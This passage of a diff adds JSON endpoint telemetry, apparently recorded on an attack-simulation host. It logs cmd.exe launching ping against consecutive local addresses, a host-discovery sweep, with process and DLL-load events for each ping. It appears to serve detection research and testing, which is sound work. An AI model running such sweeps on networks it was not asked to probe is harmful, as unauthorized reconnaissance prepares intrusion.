"C:\\Windows\\System32\\mswsock.dll", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573007140000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "event_type": "process", + "pid": 7504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573011990000, + "unique_pid": "{42FC7E13-CBB4-5C05-0000-001022965301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.209", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6400, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573012150000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573012140000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "event_type": "process", + "pid": 6400, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573016830000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010A1985301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.210", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5616, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573016980000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "event_type": "process", + "pid": 5616, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573021830000, + "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.211", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6068, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573021980000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "event_type": "process", + "pid": 6068, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573026990000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.212", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5044, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573027140000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "event_type": "process", + "pid": 5044, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573031830000, + "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.213", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3148, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573031980000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "event_type": "process", + "pid": 3148, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573036990000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.214", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6784, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573037130000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573037140000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "event_type": "process", + "pid": 6784, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573041830000, + "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.215", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5856, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5856, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573041980000, + "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" + }, + { + "event_type": "image_load", + "image_name": 